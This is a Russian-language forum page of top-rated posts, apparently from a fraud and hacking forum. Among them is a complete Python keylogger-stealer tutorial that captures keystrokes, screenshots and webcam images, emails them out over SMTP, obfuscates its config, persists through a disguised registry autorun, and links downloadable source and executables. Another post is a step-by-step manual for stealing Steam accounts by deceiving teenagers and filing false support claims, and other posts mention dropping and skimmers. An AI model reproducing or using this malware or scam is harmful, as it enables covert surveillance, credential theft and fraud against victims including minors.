Перейти к публикации

Таблица лидеров


Популярные публикации

Отображаются публикации с наибольшей репутацией на 02.07.2022 в Сообщения

  1. 2 балла
    Охринеть!!!!! Это просто АД какой то, надо пересажать их всех к херам !!!!!!
  2. 2 балла
    Не советую там рыпаться вообще).Хотя можете смс принимать,кстати если мозгами пошевелить,то и с палочкой там поработать.
  3. 1 балл
    Салют, исследователи темной стороны интернета! Несколько дней готовил для тебя очень вкусную статью, на основе нашего keylogger модуля, который выполняет задачи полноценного стиллера. Кушать подано, приятного аппетита! Описание полноценного кейлоггера: Отправка данных по электронной почте Прикрепление к письму скриншота и снимка с веб-камеры. Два режима сбора данных:отправка каждые limit клавиш и отправка собранных данных при запуске программы. Шифрование конфигурации Копирование exe и конфигурации в папку appdata\local Добавление программы в автозагрузку Как видите, функционал keylogger'а напоминает (s)AINT, однако, как бы нескромно ни звучало, заметил пару отличительных от (s)AINT моментов в реализации: Если в тему письма входит подстрока 'node_os', то в почтовом клиенте удобно проводить мониторинг входящих, если кейлоггер используется на нескольких машинах. Легкая возможность масштабирования проекта - дополнительные модули прописывать в FullKeyLogger.__init__, загрузка конфигурации(если требуется) - FullKeyLogger.load_config К минусу (в сравнении с (s)aint) относится конечный размер exe файла - 33 мб для версии со скриншотом и вебкамерой. Для написания полноценного кейлогера будем использовать раннее написанные модули: keylogger mail module_manager (webcam, screenshot) Опишем основные функции для работы с модулем кейлоггера: pip install keyboard opencv-python pillow Python: import os import re from additional import make_zip from keylogger import key_logger_manager from mail import mail_manager from module_manager import webcam_manager, screenshot_manager # упаковка логов и запуск модулей (вебкам, скриншот, отправка сообщения) def collect_and_send(): # Упаковываем созданные логи collect_logs(get_old_files(key_config['filename'], key_config['replace_part']), key_config['archive_log']) # Если упаковалось, то if os.path.exists(key_config['archive_log']): try: # снимок с вебкамеры webcam_manager(webcam_config) except: # игнорирование отсутствия библиотеки pass # делаем скрин и отсылку сообщения screenshot_manager(screenshot_config) mail_manager(mail_config) # получаем список файлов для упаковки def get_old_files(filename, replace_part): # задаем шаблон для подходящих файлов re_filename = rf"{os.path.basename(filename).replace(replace_part, '(.{1,3})')}" dir_logs = os.path.abspath(os.path.dirname(filename)) # если папка существует, if os.path.exists(dir_logs): # то упаковываем return [os.path.join(dir_logs, file) for file in os.listdir(dir_logs) if re.fullmatch(re_filename, file)] return None # упаковка логов из [files] в archive_log файл. def collect_logs(files, archive_log): if files: make_zip(files=files, filename=archive_log) # удаление всех упакованных файлов for file in files: try: os.remove(file) except: pass # Менеджер для full кейлоггера def full_keylogger_manager(): on_save = None # если режим отправки при запуске, if key_config['mode'] == 'launch': # то упаковываем и отправляем collect_and_send() # если режим отправки каждой части elif key_config['mode'] == 'every_part': # то назначаем событие упаковки-отправки на on_save on_save = collect_and_send # запускаем кейлогер с триггером на сохранение (None, collect_and_send) key_logger_manager(key_config, on_save) if __name__ == '__main__': # archive_log - путь сохранения архива с логом # mode - every_part/launch режим сохранения логов key_config = { "filename": "key_logs\\keylogger_num.json", "replace_part": "num", "limit": 100, "archive_log": "result\\log.zip", "mode": "every_part", } webcam_config = {"filename": "result\\cam.png"} screenshot_config = {"filename": "result\\screenshot.png"} mail_config = { "config": {"host": "smtp.gmail.com", "port": [25, 587, 465]}, "login_data": {"login": "", "password": ""}, "mail": {"from": "", "to": "", "subject": "[node_os]", "message": "", "attach": ["result\\log.zip", "result\\screenshot.png", "result\\cam.png"]}} try: full_keylogger_manager() except: pass Выполнив код, и постучав по клавиатуре, получил письмо с пустым содержанием, с архивом логов и скрином. (web-камеры нет + virtual os) Добавим к тексту сообщения содержание simple_log'ов: Python: def prepare_message(): message = '' # для файлов, сохраняемым в функции simple_log for filename in [key_config['filename'], key_config['filename'].replace(key_config['replace_part'], 'alt')]: with open(filename, 'r') as simple_file: message = f'{message}\n{"-" * 25}\n{simple_file.read()}' mail_config['mail']['message'] = message Конфигурацию нельзя хранить в открытом виде(в данном проете точно), поэтому их либо можно держать в коде, и тогда при компиляции они будут скрыты в exe, а можно держать конфиги в зашифрованном виде, для возможности смены настроек на лету. Основные функции: Python: import base64 # зашифровать crypt_config = base64.b64encode(bytes(json.dumps(config), 'utf-8')) # расшифровать config = json.loads(base64.b64decode(crypt_config)) # добавим функции для шифровки и расшифровки конфигов def decode_config(in_filename=None, crypt_config=None): if in_filename: with open(in_filename, 'rb') as crypt_file: crypt_config = crypt_file.read() return json.loads(base64.b64decode(crypt_config)) def encode_config(config, out_filename=None): encoded = base64.b64encode(bytes(json.dumps(config), 'utf-8')) if out_filename: with open(out_filename, 'wb') as crypt_file: crypt_file.write(encoded) Добавив интерфейс по работе из командной строкой, получим модуль: config_encoder.py: import base64 import json import sys DEFAULT_CRYPT_NAME = 'config.crypt' DEFAULT_DECRYPT_NAME = 'config.json' def decode_config(in_filename=None, crypt_config=None): if in_filename: with open(in_filename, 'rb') as crypt_file: crypt_config = crypt_file.read() return json.loads(base64.b64decode(crypt_config)) def encode_config(config, out_filename=None): encoded = base64.b64encode(bytes(json.dumps(config), 'utf-8')) if out_filename: with open(out_filename, 'wb') as crypt_file: crypt_file.write(encoded) def get_args(): args = sys.argv[1:] if len(args) >= 3: mode, in_filename, out_filename = args[0], args[1], args[2] elif len(args) == 2: mode, in_filename = args[0], args[1] mode_set = {'encode': DEFAULT_CRYPT_NAME, 'decode': DEFAULT_DECRYPT_NAME} if mode in mode_set: out_filename = mode_set[mode] else: raise ValueError('Неизвестный режим') else: raise SyntaxError('Недостаточно данных') return mode, in_filename, out_filename def base64_engine(mode, in_filename, out_filename): if mode == 'encode': with open(in_filename, 'r') as config_file: config = json.load(config_file) encode_config(config, out_filename) elif mode == 'decode': config = decode_config(in_filename) with open(out_filename, 'w') as config_file: json.dump(config, config_file) def execute_from_args(): try: mode, in_filename, out_filename = get_args() base64_engine(mode, in_filename, out_filename) except Exception as e: print(e) if __name__ == '__main__': execute_from_args() Синтаксис шифрования\расшифрования python config_encoder.py mode in_file out_file Например: python config_encoder.py encode config.json - шифровка python config_encoder.py decode config.crypt - расшифровка Теперь дополним модуль additional методами копирования файла в appdata\local, и добавление файла в автозагрузку (в реестр): additional.py: from winreg import OpenKey, HKEY_CURRENT_USER, KEY_ALL_ACCESS, SetValueEx, REG_SZ, CloseKey def copy_to_local(filename, path=None): # Формируем путь к папке local target_path = os.path.join(os.path.expanduser('~'), 'appdata', 'Local') # если путь задан, то дополняем путь if path: target_path = os.path.join(target_path, path) # имя файла в который копировать target_file = os.path.join(target_path, os.path.basename(filename)) make_folders(target_file) # копируем shutil.copy(filename, target_file) return target_file def add_autorun(name, path): # Открываем ключ в нужном разделе key = OpenKey(HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 0, KEY_ALL_ACCESS) # задаем значение SetValueEx(key, name, 0, REG_SZ, path) # закрываем ключ CloseKey(key) Оформив все наработки в класс, получим: full_keylogger.py: import os import re import sys from additional import make_zip, add_autorun, copy_to_local from config_encoder import decode_config from error_log import ErrorLog from keylogger import key_logger_manager from mail import mail_manager from module_manager import screenshot_manager, webcam_manager # имя для конфигурации DEFAULT_CONFIG_NAME = 'config.crypt' class FullKeyLogger: # при инициализации принимаем общий конфиг def __init__(self, global_config): self.error_log = ErrorLog() # разделяем конфиги self.key_config, self.mail_config, self.screen_config, self.webcam_config, self.autorun_config = \ self.load_config(global_config, ['keylogger', 'mail', 'screenshot', 'webcam', 'autorun']) # сопоставляем конфиги и менеджеры self.module_set = [(self.screen_config, screenshot_manager), (self.webcam_config, webcam_manager), (self.mail_config, mail_manager)] self.add_to_autorun() # добавление кейлоггера в автозапуск def add_to_autorun(self): try: if self.autorun_config['use']: # копирование файла конфига в локал copy_to_local(DEFAULT_CONFIG_NAME, self.autorun_config['name']) # добавление в автозапуск скопированного в локал exe add_autorun(self.autorun_config['name'], copy_to_local(os.path.abspath(sys.argv[0]), self.autorun_config['name'])) except Exception as e: self.error_log.add('Keylogger - (add to autorun)', e) # функция разделения конфигов @staticmethod def load_config(global_config, modules): configs = {} for config in modules: try: # для каждого модуля запоминаем свой конфиг configs[config] = global_config[config] except: configs[config] = None return configs['keylogger'], configs['mail'], configs['screenshot'], configs['webcam'], configs['autorun'] @staticmethod def get_old_files(filename, replace_part): re_filename = rf"{os.path.basename(filename).replace(replace_part, '(.{1,3})')}" dir_logs = os.path.abspath(os.path.dirname(filename)) if os.path.exists(dir_logs): return [os.path.join(dir_logs, file) for file in os.listdir(dir_logs) if re.fullmatch(re_filename, file)] return None @staticmethod def collect_logs(files, archive_log): if files: make_zip(files=files, filename=archive_log) for file in files: try: os.remove(file) except: pass def execute_modules(self): for module in self.module_set: try: if module[0]['use']: module[1](module[0]) except Exception as e: self.error_log.add('Keylogger - (execute module)', e) def collect_and_send(self): try: self.prepare_message() self.collect_logs(self.get_old_files(self.key_config['filename'], self.key_config['replace_part']), self.key_config['archive_log']) if os.path.exists(self.key_config['archive_log']): self.execute_modules() except Exception as e: self.error_log.add('Keylogger - (collect and send)', e) self.error_log.save_log(self.key_config['error_log']) def prepare_message(self): try: message = '' for filename in [self.key_config['filename'], self.key_config['filename'].replace(self.key_config['replace_part'], 'alt')]: try: with open(filename, 'r') as simple_file: message = f'{message}\n{"-" * 25}\n{simple_file.read()}' except: pass self.mail_config['mail']['message'] = message except Exception as e: self.error_log.add('Keylogger - (prepare message)', e) def start(self): on_save = None if self.key_config['mode'] == 'launch': self.collect_and_send() elif self.key_config['mode'] == 'every_part': on_save = self.collect_and_send key_logger_manager(self.key_config, on_save) def full_key_logger_manager(): key_logger = FullKeyLogger(decode_config(DEFAULT_CONFIG_NAME)) key_logger.start() if __name__ == '__main__': try: full_key_logger_manager() except: pass измените модуль кейколлекшн -> закомментируйте тело метода stop(замените на pass) Работа с конфигурацией Пример расшифрованного конфига: config.json: { "keylogger": { "filename": "key_logs\\keylogger_num.json", "replace_part": "num", "limit": 100, "archive_log": "result\\log.zip", "mode": "every_part", "error_log": "errors.log"}, "autorun": {"use": true, "name": "keylogger"}, "screenshot": {"use": true, "filename": "result\\screenshot.png"}, "webcam": {"use": true, "filename": "result\\cam.png"}, "mail": { "use": true, "config": {"host": "smtp.gmail.com", "port": [25, 587, 465]}, "login_data": {"login": "", "password": ""}, "mail": { "from": "", "to": "", "subject": "[node_os]", "message": "", "attach": ["result\\log.zip", "result\\screenshot.png", "result\\cam.png"]} } } Введите свои почтовые данные, В mail->mail->attach не забудьте указать все файлы для прикрепления Укажите keylogger->mode = (every_part/launch) - режим отправки данных каждой части или при запуске Поменяйте (если требуется) autorun->name на ожидаемый ключ в реестре(например, securelib, и тд) Для отключения дополнительного модуля, поменяйте значение 'use' на false. Зашифруйте конфигурацию в файл DEFAULT_CONFIG_NAME. python config_encode.py encode config.json config.crypt Либо запустите файл make_config.bat из архива full_keylogger_exe Вот так мы написали стиллер, собирающий нажатия клавиш, скриншот и снимок с веб-камеры, который может потягаться с известным стиллером (s)AINT (java). Прикрепляю все полученные файлы: full_keylogger_source - исходные коды full_keylogger_exe (две части) - исполняемый файл стиллера, шаблон с конфигурацией(json), encoder.exe https://mega.nz/#F!RmRSCCSJ!tPea06AhJQkxjEeG021Geg
  4. 1 балл
    скинь еще , если такой умный
  5. 1 балл
    Привет, поздравляю тебя с покупкой мануала по взлому STEAM Итак, приступим к подготовке. 1. Рублей 500 (сумма зависит от вас, дальше поясню) 2. Левый аккаунт ВКонтакте. Начинаем! Логинимся в аккаунт вк и рассылаем заявки в эти группу (подобной тематики) : https://vk.com/rfcheats / https://vk.com/midnightcsgo / После выполнения, пока ждем одобрения заявки, приступаем в следующему шагу. Закидываем на наш киви или вм кошелек* (карту) 250 - 300 руб, чтобы быть готовым к 3 ему шагу. Рисуем в фотошопе вот такой значок сверху запущенной кс. "Сюда не могу, прикреплю вниз." В пабликах из 1-ого шага ищем людей, набирающих массовку в “беседки читеров”. Пишем им сообщение с скриншотом, датой окончания подписки (не более месяца с текущей даты) и скриншотом, с просьбой принять вас в беседу. Пишем: “Ищу человека, который обменяет стим рубли на яндекс(киви и т.д). Сам живу в Финляндии(/стране с той картой, которую юзаешь. PS: Только для прошедших первый шаг, для остальных - называем любую страну с $). Через семейный доступ. Я вам 350 на счет стима, а вы 150 мне на яндекс, киви, вм(цифры зависят от вас, играем на жадности). Срочно деньги нужны, надо срочно сестре/брату в Россию отправить" Вам пишут школьники, говорят то что готовы вам помочь. Соглашаемся, просим логин и пароль для входа в стим через семейный доступ. Пополняем им счет с киви/вм, но через $ счет, так, чтобы валюта перешла в доллары. ОБЯЗАТЕЛЬНО СОХРАНЯЕМ ССЫЛКУ НА АККАУНТ. Говорим все, отправил. Он заходит, смотрит, и, либо посылает вас и кидает в чс, либо отправляет вам обещанные деньги. В случае с 1-ым вариантом не переживаем. Следующим шагом пишем в Тех-Поддержку стима с примерным содержанием: “Здравствуйте, я потерял телефон, на котором у меня был установлен стим и у меня взломали аккаунт. Прошу восстановить мне доступ к нему. Недавно счет пополнялся с киви/вм (откуда вы пополняли счет) на /сумма/ /дата/. Логин от аккаунта /логин/, пароль - /пароль/, ссылка на аккаунт - /ссылка/ Надеюсь на вашу помощь.” После отправки сообщения просто ждем ответа (обычно в течение 3 дней). Вам восстанавливают аккаунт, привязываете свой номер, моб. аутентификатор и выводите вещи. Техподдержка просто не успевает восстановить аккаунт (2 обращение подряд просто игнорят). На этом все, аккаунт можете продать быстро кому нибудь, до того, или можете посадить VAC. На форуме не нашёл, поэтому и слил.
  6. 1 балл
  7. 1 балл
    Актуально ! Нужна работа в МСК хорошо оплачиваемая . Пишите в телеграмм : @molotok999
  8. 1 балл
    Ты чего люде закошмарил ?)
  9. 1 балл
    Бабулей и Дедулей обманывать последнее дело и так на копейки живут
  10. 1 балл
  11. 1 балл
    Ребята подскажите здесь ским продают без кидалова?
  12. 1 балл
    Начнем с того, что никто никогда никому ничего не делает за просто так. Вы можете выйти на улицу и первому встречному дать приличную сумму денег? Обычно происходит либо пересечение интересов и ресурсов, либо сотрудничество, и только в этом случае тебе могут что-то сделать те, у кого больше ресурсов. Если вы хотите найти полезные связи, то должны понимать и знать, как грамотно подкатить. В первую очередь вы должны подумать, как помочь ресурсному человеку в его деле или решить его проблему. И не просить ничего ни при каких обстоятельствах. Тех, кто у них постоянно что-то просит, их огромное количество, как паразитов. Как только у человека появляется большое количество денег, у него тут же обнаруживается куча друзей, родственников, и прочих подхалимов и всех остальных желающих подмазаться, что его начинает просто тошнить от такого отношения. Успешные и богатые люди зачастую стремятся к изоляции и одиночеству. Если вам попался такой знакомый, и если он почувствует, что вы ничего не можете ему дать, у вас даже мышление не работает в этом направлении, а работает по принципу «помоги, у тебя же и так все есть, от тебя не убудет!», то забудьте, что вы с этим человеком хотя бы ещё раз встретиться. Он сделает всё, чтобы вас от себя изолировать. Паразитическое, потребительское и приспособленческое мышление — это стандарт поведения большинства людей, особенно бедных и неуспешных. Подход с позиции получить на халяву проявляется во всем. Никто никогда не думает, с чего вдруг тебе кто-то должен помогать и решать твои проблемы. Никто не задумывается, а что он сам в первую очередь может сделать для этого человека, чтобы ему было интересно пообщаться и как-то помочь. Успешные люди открытые и общительные, но только с теми в ком не видят приспособленцев и халявщиков. Они, как правило, все очень открытые. Но обычно на контакт с ними пытаются выходить по идиотский и по принципу «сейчас я попробую что-то от него поиметь!», чтобы за просто так. Типа «от него не убудет, и так богатый, , а я зато счастливым стану, заживу!». Чем больше подход, по принципу «я весь такой несчастный, ранимый, помоги, мне очень плохо, у меня депрессия, мне так тяжело, а тебе ничего не стоит, протяни мне руку помощи и у меня сразу жизнь наладится, пожалуйста, тебе же не сложно, моя жизнь на волоске», тем сильнее успешные состоявшиеся люди ненавидят таких просящих. Сколько раз я видел, как они реагируют на такие просьбы — у всех всегда негатив. Казалось бы странно, человеку плохо, он просит о помощи, почему бы и не помочь, ведь это по всем канонам и нормам библии и религии только приветствуется и поощряется. Успешные люди просто знают, из какого теста сделан человек, и знают не только цену своим деньгам, но и видят жизнь такой, какая она есть, поэтому всегда призирают симулянтов и халявщиков, которые из себя изображают бедных овечек и несчастных страдальцев. Чем навязчивее и жалостливее их просишь, тем больше вероятность, что тебе не просто не помогут, чтобы ты, наконец, перестроил своё мышление. Потому что они понимают, что люди с паразитическим мышлением никогда не изменятся, и ничего у них в жизни не наладится. К богатым успешным людям очень часто обращаются малознакомые или совсем не знакомые люди, с тупыми и бесперспективными «деловыми» предложениями, или с позицией выехать за его счёт и попытаться выманить инвестиции. У них на глазах тут же появляется циничная ненависть, потому что они устали слушать этих нытиков и попрошаек. А больше всего они ненавидят родственников и старых друзей, потому что те просят больше всех, типа «помоги, ты же сват, брат, муж моей сестры, сделай мне ремонт, ты же миллионер». Они ненавидят этих паразитов. Эти люди сами нелёгким трудом добились своей цели, и знают цену, которую они заплатили, тернии, через которые прошли. Только они пытаются начать пожинать плоды и наслаждаться результатами своего адского труда (а это всегда колоссальная работа над психикой, и цена этому надломленное здоровье), как тут же приходят какие-то халявщики, которые не выстрадали от его работы даже десятой доли процента, и хотят то же самое получить на халяву. У них к этим халявщикам просыпается настоящая ненависть. Через некоторое время они становятся бронебойными циничными пофигистами. Повышение по службе или заключение выгодного контракта не всегда связано только с личными заслугами, иногда правильное знакомство значит гораздо больше для достижения успеха. Нередко мы замечаем, что удается намного быстрее достигнуть поставленной цели с помощью полезных контактов и связей, а не благодаря собственному опыту и компетентности. Чтобы завести знакомства с влиятельными людьми, нужно постоянно расширять свой круг общения. Но как правильно формировать этот круг, нужно ли знакомиться со всеми или быть избирательным в общении? Советы про нетворкинг: как завести знакомства и создать прочные связи? Нетворкинг и правильный поиск знакомых Дословно «нетворкинг» («net» — сеть, а «work» — работа) – способ поиска и укрепления контактов и связей, которые могут быть полезными в деловой сфере. Главная задача нетворкинга – завести знакомства избирательные, а не хаотичные, то есть выбирать те, которые действительно могут пригодиться в будущем для бизнеса и карьеры. Если вы только начали заниматься нетворкингом, то попробуйте вначале количественный способ, постарайтесь за определенное количество времени познакомиться с несколькими людьми, чем больше их будет, тем лучше. Но чтобы завести знакомства действительно ценные и увеличить эффективность нетворкинга, уделяйте особое внимание профильным местам: посещайте бизнес-тренинги, деловые приемы,специальные мероприятия. Если вы будете ходить в такие места, то вероятность знакомства с полезными людьми увеличивается в несколько раз. Не забывайте поддерживать связи с новыми знакомыми, со временем вы поймете, какие знакомства нужно сохранять и укреплять, а какие нет. Некоторые контакты можно не делать прочнее, но хранить визитки людей. Множество контактов и встреч предполагает трату большого количества времени. Но как можно завести знакомства и успевать заниматься другими делами? Специалисты советуют превратить нетворкинг в образ жизни, но сделать это сможет далеко не каждый человек. Вам придется привыкнуть к постоянным знакомствам и походам по деловым мероприятиям. Если вам сложно поддерживать такой образ жизни, вам лучше выбрать определенный круг людей, с которыми собираетесь постоянно поддерживать связь, то есть взять за основу не количество, а качество. Когда вы отобрали людей, с которыми будете поддерживать связи, работайте только с ними. У многих нетворкеров возникают проблемы с поддержкой связей. Они посещают полезные деловые мероприятия, получают визитки важных людей, продолжают с ними общение, созваниваются и т.д., но положительных результатов нет. В чем причина? Все было сделано точно по правилам, но связи не помогают в продвижении карьеры или бизнеса. Что делать? Как исправить ситуацию? Подумайте над своим деловым подходом перед тем, как завести знакомства. Скорее всего, он сухой и не заинтересовывает собеседника, вы стараетесь во время одного приема познакомиться с большим количеством людей, поэтому не можете уделить достаточного внимания каждому. Рекомендации начинающему нетворкеру Если вы отправляетесь на мероприятие в круг незнакомых вам людей, то завести знакомство с влиятельным человеком не так и просто, особенно, если вы постоянно следите за ним. Перед тем, как налаживать контакты с такими людьми, нужно помнить, что впечатление о человеке формируется в первые 10 секунд знакомства, но сделать это практически невозможно, если человек о вас ничего не слышал. Самый надежный помощник в этом случае тот, кто знает вас, и того, с кем вы решили познакомиться. Он может дать письменную или устную рекомендацию, сделать комплимент или даже просто упомянуть о ваших положительных качествах в разговоре. Если вы решите завести знакомства после рекомендаций, то увидите, что ваш потенциальный знакомый будет настроен на знакомство и будет вести себя дружелюбно, потому что слышал о вас что-то хорошее. Помните, что ваш будущий знакомый и друг или коллега, который дает рекомендации, должны находиться в хороших отношениях, иначе смысла в рекомендациях не будет. Но в деловых кругах получить рекомендацию даже от друга не так просто. Тот, кто будет вам помогать заводить знакомства, должен быть уверен, что его репутация от этого не пострадает. Чтобы не подвести его, у вас должно быть стоящее предложение, вам нужно заранее подготовиться и продумать план действий. Несмотря на все правила нетворкинга, завести знакомства можно не только в деловой атмосфере, но и на вечеринке среди близких людей. Вы можете иногда их посещать или даже устраивать сами. Даже если у вас не получится таким образом встретиться с влиятельным человеком, у вас появится возможность получить рекомендации. Какие контакты нужно выбирать для общения? Опытные нетворкеры знают, что одновременно поддерживать множество контактов бессмысленно, на это уходит слишком много времени, но положительных результатов не бывает. Также не стоит концентрироваться только на одном человеке, каким бы он ни был влиятельным, он сможет вам постоянно помогать в карьере или бизнесе. Чтобы окружить себя только полезными и интересными связями, вначале внимательно оцените всех своих знакомых и выделите из них только самых продуктивных, запишите их контакты в список полезных. Это могут быть старые и новые друзья, клиенты, коллеги, руководители и т.д. Но в большинстве случаев они заняты с вами в одной отрасли, поэтому не смогут привнести в ваш бизнес что-то новое. Чтобы завести знакомства, которые помогут вам преуспеть в новых направлениях, нужны знакомые из других сфер деятельности. Такие знакомые помогут вам развиваться и привнесут глоток свежего воздуха в ваше профессиональное развитие. Желательно, чтобы среди знакомых были люди, которые помогут сделать жизнь проще: врач, нотариус, парикмахер, компьютерный мастер и т.д. Перед тем, как завести знакомства, обращайте внимание на темперамент и характер собеседника, если он не похож на ваш, это еще не повод отказываться с ним общаться.
  13. 1 балл
    Нормально так можно кэша выводить
  14. 1 балл
    Елочка очень красивая получилась
  15. 1 балл
  16. 1 балл
    Интересная статья, не знал,что можно посмотреть, что человек и интеренете делает
  17. 1 балл
    На старость лет решил побыть дропом , не боялся вовсе Все прошло успешно, спасибо
  18. 1 балл
  19. 1 балл
    взял платину, были проблемы с сдеком, но тс все равно замутил доставку на нужный адрес)) будем брать еще)
  20. 1 балл
  21. 1 балл
    Кадр: CupcakeSurpriseToys / YouTube В июне Европол объявил о новой стратегии борьбы с распространением детских интимных фото: теперь тысячи волонтеров выискивают на них зацепки, которые выводят спецслужбы на след преступников. В Великобритании тех, кто издевается над детьми и продает снимки педофилам, уже приравнивают к террористам. «Лента.ру» разбиралась, как целая индустрия, основанная на насилии, стала одной из главных мировых проблем и как неравнодушные граждане помогают вычислять педофилов. Тысячи глаз Полицейская служба Европейского союза (Европол) обратилась за помощью к пользователям сети: специалисты изучили тысячи порноснимков несовершеннолетних детей и поняли, что даже самые мелкие детали могут помочь найти преступников. На сайте проекта, посвященного борьбе с издевательствами над детьми, опубликованы десятки фрагментов незаконных изображений. На них случайные предметы одежды, игрушки, бутылки и прочие вещи, которые кто-то может узнать. Понятное дело, что самих детей при этом на фото нет. Проект работает чуть более месяца, и за это время спецслужбы получили более 14 тысяч писем от тех, кто нашел какие-то зацепки. Такие методы поиска педофилов впервые опробовали еще в 2012 году: спецслужбы долго отслеживали неизвестных, которые, судя по снимкам в «темном» интернете, издевались над собственным ребенком. Среди прочих была фотография, где подвергавшаяся насилию девочка держала в руках только что пойманную рыбу. Рыба на фото с ребенком, находящимся в опасности, подсказала следователям, где искать преступников Рыба на фото с ребенком, находящимся в опасности, подсказала следователям, где искать преступников Это фото стало отправной точкой для поимки преступников: с помощью специалистов из Корнельского университета следователи определили вид рыбы и выяснили, в каких конкретно штатах ее можно поймать. После этого владельцам кемпингов разослали изображения родителей, которые также попали на снимки, и вскоре их удалось найти и задержать. «Да, это иголка в стоге сена, но мы нашли эту иголку», — рассказывал тогда один из участников операции. Американский Национальный центр пропавших и эксплуатируемых детей (NCMEC) в среднем обрабатывает около 500 тысяч изображений в неделю — циркулирующие на черном рынке сборники детских фото или раскиданные по всему интернету одиночные изображения. Активисты постоянно отыскивают на них разнообразные свидетельства: марки одежды, упаковки от продуктов, мелкие предметы быта, которые могут указать хотя бы на страну, где проживает педофил. Темный склад Но чаще работают куда более простые методы. В 2013 году голландская организация по защите детей устроила масштабную операцию по поимке педофилов. Активисты создали профиль десятилетней девочки, которая якобы была готова к сексуальным отношениям, и запросили за онлайн-трансляцию с ней 20 долларов. Спустя десять недель более чем в 70 странах были найдены тысячи любителей малолетних: все они оплатили стрим своими кредитками и без тени сомнений указывали личные данные для связи. Спецслужбы по всему миру пытаются найти зацепки в любых изображениях, на которых засветились издевающиеся над детьми взрослые Спецслужбы по всему миру пытаются найти зацепки в любых изображениях, на которых засветились издевающиеся над детьми взрослые Тогда преступникам даже в голову не приходило, что их можно отследить по банковской карте. И пусть по итогам операции удалось арестовать лишь несколько человек, стало ясно, что так можно выманивать извращенцев, ищущих в сети детское порно. В 2006 году была создана Финансовая коалиция против детской порнографии: крупнейшие платежные системы, такие как MasterCard, Visa, American Express и PayPal, договорились следить за получателями денежных переводов, которыми оплачивают распространение эротических фото с детьми. Но это привело к тому, что преступники освоили анонимные платежи и криптовалюты. Поняли они и то, что в обычном интернете им делать нечего: площадки с детским порно постоянно закрывались, а покупателей и продавцов массово арестовывали. Именно на это время и пришелся расцвет педофильских форумов в даркнете. Не желавшие лишиться заработка производители детского порно создавали сайты в зоне .onion, на которых можно было не только скачать или поделиться любимыми изображениями, но и обсудить свои пристрастия. Как агенты ФБР помогали педофилам и взломали Tor В июле 2017 года полиция Германии арестовала предполагаемого администратора крупнейшей площадки с детским порно в даркнете, на которой зарегистрированы почти 90 тысяч пользователей. На этом сайте были тысячи разбитых по категориям фото- и видеофайлов, в том числе ролики с детьми до трех лет. Хозяином площадки оказался 39-летний житель района Лимбург-Вейльбург к северу от Франкфурта. Но его сообщники и последователи разбрелись по другим тайным площадкам, найти которые становится все сложнее. Пристальное внимание правоохранительных органов и операции по поимке педофилов вынуждают администраторов ресурсов по продаже наркотиков и оружия вводить запрет на детское порно, поэтому они уходят на еще более законспирированные сайты. Правда, запреты эти нередко расходятся с делом, недаром крупнейшего в «темном» интернете хостинг-провайдера Freedom Hosting II уличили именно в обслуживании педофильских форумов. Как ни странно, покончить с этим решили анонимные хакеры: в ходе одной из атак они буквально уничтожили провайдера. Это серьезно ударило по всему даркнету: через месяц после падения Freedom Hosting II 85 процентов всех сайтов прекратили работать. Стоявшие за атакой Anonymous назвали взлом местью за издевательства над детьми. Камера, позор Основным поставщиком детского порно остаются Филиппины. Для живущих там издевательства над детьми ради денег — вполне регулярная практика. Обычно бедствующим родителям достаточно провести в дом интернет и купить простенькую веб-камеру, чтобы начать транслировать сексуальные утехи со своими детьми на радость «белым мужчинам». Филиппинские дети часто винят себя в том, что их родители предстали перед судом из-за порнографических «шоу» Филиппинские дети часто винят себя в том, что их родители предстали перед судом из-за порнографических «шоу» Широкое распространение интернета и поголовная нищета стали катализатором для резкого роста порноиндустрии. Причем за этим бизнесом не всегда стоят преступные группировки — порой родители без всякого принуждения решают подзаработать на отпрысках, запуская стрим и выполняя все просьбы зрителей. Сеансы с трансляциями стоят от 5 до 200 долларов, что для филиппинцев огромные деньги. Индустрию подстегивает и относительное бездействие местной полиции: на конец 2016 года по факту семейных издевательств было заведено два уголовных дела, другие находились на рассмотрении. Раскрыть такие дела почти нереально по одной простой причине: дети не готовы свидетельствовать против родителей, а доказать факт издевательств по-другому не получится. Сеансы с «белыми мужчинами» проходят на стриминговых площадках без записи или по Skype. Три алмаза за клубничку Азиаты тратят последние деньги на трансляции с обнаженными дамами Более того, борцы с такими стримами утверждают, что пойманные с поличным дети часто чувствуют вину перед родителями. Не осознают тяжести своих преступлений и родители: одна из филиппинок, угодившая за решетку за издевательства над шестью собственными детьми, родила в тюрьме седьмого и до сих пор верит, что не сделала ничего плохого. Помещенные в реабилитационные центры дети часто рассказывают, что благодаря «шоу» они стали часто ходить в рестораны, а матерям больше не нужно было сутками работать на фабриках, чтобы прокормить семью. Детский фонд ООН, курирующий ситуацию с издевательствами над малолетними на Филиппинах, признает, что без противодействия со стороны властей местная порноиндустрия будет расти и развиваться. Именно поэтому в европейских странах, США и Австралии, где число сетевых педофилов бьет все рекорды, их приравнивают к террористам и отслеживают всеми доступными способами.
  22. 1 балл
    Может быть я и повторюсь в чем то, но не судите строго, первая статья Хотелось бы получить VIP Статус! но про безопасность можно говорить всегда) Как говорится:" повторение мать ученья"! Введение: зачем это нужно? Компьютеризация населения сделала заметный вклад в повседневную деятельность среднестатистического человека. Для кого-то информационные технологии стали средством получения стабильного дохода, зачастую не совсем законного, а для кого-то и совсем незаконного (простите за каламбур). Цель данного материала состоит не в описании каких-то сложных схем сокрытия факта своей деятельности от налоговой инспекции и не в предоставлении инструкции по исключению встречи с правоохранительными органами. Если читателю есть что скрывать, данный обзор подскажет как лучше организовать процесс сокрытия, в зависимости от ситуации. Схемы, представленные в обзоре, представляют собой некую базу, на основе которой можно строить свои методики. 1. Конфиденциальность при работе с операционной системой. Небольшое отступление: идея написать данный материал возникла из небольшого поста в моем блоге ("Анализ конфиденциальности при работе с гостевой ОС"), поэтому начну с рассмотрения излюбленной многими концепции «виртуальной машины». 1.1 Использование виртуальных машин. Иллюзия изолированности гостевой ОС разрушается при рассмотрении некоторых процессов, протекающих в основной ОС. В клиентских линейках многих операционных систем присутствует режим гибернации. При переходе в данный режим содержимое оперативной памяти отображается на жесткий диск и при стандартных настройках системы остается до следующего перехода. Риск сохранения состояния гостевой ОС на жестком диске довольно высок и не стоит списывать его со счетов. Для ускорения работы ОС существует механизм постраничного сохранения участков оперативной памяти, которые не используются довольно продолжительное время (swap). Далее, при обращении к такому участку он восстанавливается в оперативную память. Соль этого механизма в том, что все эти манипуляции производятся прозрачно для пользователя и последний никак не может повлиять на процесс копирования. Изменение размера файла подкачки 